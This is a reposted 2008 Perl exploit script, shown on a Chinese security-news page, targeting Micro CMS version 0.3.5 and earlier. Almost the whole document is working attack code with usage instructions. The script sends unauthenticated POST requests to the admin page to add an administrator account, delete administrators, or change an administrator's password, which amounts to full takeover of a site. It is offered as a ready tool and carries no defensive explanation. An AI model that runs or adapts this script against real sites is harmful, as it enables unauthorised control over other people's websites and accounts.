Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit

来源：StAkeR[at]hotmail[dot]it 作者：StAkeR 发布时间：2008-11-03

#!/usr/bin/perl
# --------------------------------------------------------------
# Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit
# StAkeR[at]hotmail[dot]it
# http://www.impliedbydesign.com/apps/microcms/microcms.zip
# --------------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($admin,$passwd);
my @real = undef;
my $http = new LWP::UserAgent;
my ($host,$path,$tell) = @ARGV;

if($host !~ /http:\/\/(.+?)$/i || $tell !~ /^\-(delete|change|add)?$/i)
{
print STDOUT "[+] Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit\n";
print STDOUT "[+] Usage: perl $0 http://[host] [path] -option (-delete,-change,-add)\n";
exit;
}

if($tell =~ /delete/i)
{
print STDOUT "[+]Admin ID: ";
chomp($admin = <STDIN>);

if(defined $admin)
{
    print STDOUT del_admin($admin);
    exit;
}
else
{
    print STDOUT "[+] Not Defined!\n";
    exit;
}
}

if($tell =~ /change/i)
{
print STDOUT "[+] Admin ID : ";
chomp($admin = <STDIN>);

print STDOUT "[+] New Password: ";
chomp($passwd = <STDIN>);

if(defined $admin || defined($passwd))
{
    print STDOUT change_pwd($admin,$passwd);
}
else
{
    print STDOUT "[+] Not Defined!\n";
}
}

if($tell =~ /add/i)
{
print STDOUT "[+] Admin Username: ";
chomp($admin = <STDIN>);

print STDOUT "[+] Admin Password: ";
chomp($passwd = <STDIN>);

if(defined $admin || defined($passwd))
{
    print STDOUT add_admin($admin,$passwd);
}
else
{
    print STDOUT "[+] Not Defined!\n";
}
}

sub change_pwd
{
my ($userid,$passwd) = @_;

my $post = {
               action                  => 'change_password',
               administrators_id       => $userid,
               administrators_password => $passwd,
            };

$http->post($host.'/'.$path.'/microcms-admin-home.php',$post);

return "[+] Password Changed! ($passwd)\n";

}

sub del_admin
{
my $userid = shift @_;

my $post = {
               action                  => 'delete_admin',
               administrators_id       => $userid,
            };

$http->post($host.'/'.$path.'/microcms-admin-home.php',$post);

return "[+] Admin ($userid) Has Been Deleted!\n";

}

sub add_admin
{
my ($username,$password) = @_;
my $level = 1;

my $post = {
               action                  => 'add_admin',
               administrators_name     => $username,
               administrators_username => $username,
               administrators_password => $password,
               administrators_email    => $username,
               administrators_level    => $level,
            };

$http->post($host.'/'.$path.'/microcms-admin-home.php',$post);

return "[+] Username: $username and Password: $password\n";
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告